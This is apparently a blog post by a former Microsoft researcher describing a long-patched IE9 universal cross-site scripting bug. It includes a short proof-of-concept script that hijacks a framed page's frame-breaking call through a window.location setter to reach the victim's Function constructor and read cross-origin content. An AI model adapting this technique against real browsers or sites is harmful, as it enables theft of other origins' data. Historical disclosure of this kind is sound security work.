IE9 UXSS: Object.defineProperty Intercepts Cross-Origin Navigation

By defining a setter on window.location using Object.defineProperty, an attacker page could intercept the moment a framed page tried to break out of its frame (a common frame-breaking pattern). At that moment, arguments.callee.caller.constructor resolved to the Function constructor of the framing page’s context, which was then used to read cross-origin content.

Object.defineProperty(window, "location", {
    set: function() {
        xFunction = arguments.callee.caller.constructor;
        xFunction(
            "alert(document.URL + '\\n\\n' + document.body.innerHTML)"
        )();
    }
});
// Load a page with frame-breaking code (top.location = ...)
// into an iframe — its attempt to break out triggers the setter

A companion file framebreaker.html demonstrated the victim side: a page with top.location = "http://safe.com/" that triggered the interceptor. The setter’s caller was the victim’s frame-breaking function, and its .constructor was the Function constructor with access to the victim’s document.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 UXSS: Reading Non-HTML IFrame Content from an Inline Event Handler] :: [UXSS: Cached childNodes Collection Survives Cross-Origin Redirect] >